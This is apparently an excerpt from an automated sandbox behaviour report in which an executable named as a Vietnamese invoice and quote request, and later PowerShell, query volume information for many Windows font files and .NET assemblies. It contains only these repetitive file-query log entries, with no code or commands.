Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
